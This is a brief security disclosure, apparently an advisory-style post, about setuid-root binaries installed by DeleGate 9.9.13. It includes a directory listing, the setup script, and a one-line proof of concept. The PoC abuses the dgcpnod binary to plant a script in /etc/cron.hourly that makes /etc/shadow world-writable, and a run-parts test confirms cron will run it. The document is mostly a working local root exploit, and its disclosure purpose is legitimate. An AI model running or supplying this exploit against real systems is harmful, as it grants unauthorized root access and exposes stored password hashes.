Installation of delegate 9.9.13 sets some binaries setuid root, at least one
of these binaries can be used to gain root access.


larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
total 1916
-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
-rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh
larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
#!/bin/sh

SUBINS="dgpam dgbind dgchroot dgcpnod"
sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
if [ $? != 0 ]; then
  su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
fi

PoC:

$ touch /tmp/rootme;chmod +x /tmp/rootme;./dgcpnod /tmp/rootme /etc/cron.hourly/rootme;echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme 

Confirming Cron will run the script:
# run-parts --report --test /etc/cron.hourly
/etc/cron.hourly/rootme